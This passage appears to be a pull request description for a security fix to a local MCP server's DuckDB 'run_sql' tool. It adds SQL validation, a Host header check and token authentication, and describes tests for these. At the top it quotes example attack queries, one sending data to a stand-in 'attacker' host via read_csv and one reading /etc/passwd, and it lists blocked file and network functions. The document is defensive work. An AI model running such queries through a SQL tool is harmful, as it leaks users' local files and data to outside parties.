SELECT * FROM read_csv('http://attacker/?d=' || (SELECT ...))
SELECT * FROM '/etc/passwd'   -- DuckDB replacement scan, no read_csv() needed
```

The MCP HTTP server was also **unauthenticated** and auto-starts, so this was reachable by any local process and — without a `Host` check — via DNS rebinding from a web page the user visits.

## Fix — three layers
1. **`run_sql` sandbox** (`validateRunSqlQuery`): scrub string literals and comments in a single pass (so a blocked name hidden in a string, or a `--`/`/*` inside a string, can't fool the checks), then require a single `SELECT`/`WITH` statement, reject statement stacking, reject `FROM`/`JOIN` on a string-literal path (replacement scan), and reject the file/network/SQL-evaluating table functions (`read_csv`, `read_parquet`, `read_text`, `glob`, `query`, `postgres_scan`, …).
2. **Host check**: reject requests whose `Host` header isn't `localhost`/`127.0.0.1`/`[::1]`, closing the DNS-rebinding path.
3. **Auth token** (requested follow-up, now included): the server requires a per-user shared secret on every `/mcp` request.
   - A 32-byte URL-safe token is generated on first use and persisted under `userData` (mode `0600`), so it's stable across restarts and a copy-pasted client config keeps working; the user can **regenerate** it.
   - Accepted as `Authorization: Bearer <token>` (preferred) or a `?token=<token>` query param for clients that only take a URL; compared in constant time. `401` on missing/invalid.
   - `/health` stays open as an unauthenticated liveness probe.
   - The **MCP view** shows the token (masked, with reveal / copy / regenerate) and bakes it into every provider config snippet so setup stays copy-paste. Exposed across the stack via `CostApi.getMcpToken()` / `regenerateMcpToken()`.

Together the Host check + token close the unauthenticated-access vector. Gating the server's **auto-start** behind the persisted preference remains a small separate follow-up.

## Tests
- `run-sql-validate.test.ts`: blocked functions, replacement scan, statement stacking, evasion via string literals / comment sequences inside strings, identifiers that merely contain a blocked substring.
- `mcp-server.test.ts`: the client now authenticates; added missing-token and wrong-token `401` cases, the `?token=` query path, that `/health` stays open, the file-read rejection, and the spoofed-`Host` `403`.

## Verification
- Root `npm run check` (pre-commit) → **544 passed**, 5 skipped; tsc + eslint clean across all packages.
- No e2e test connects to the MCP server, so token auth doesn't affect the e2e suites.

Version is at `0.2.7` (version-bump gate). No `any` / `as` / non-null assertions introduced.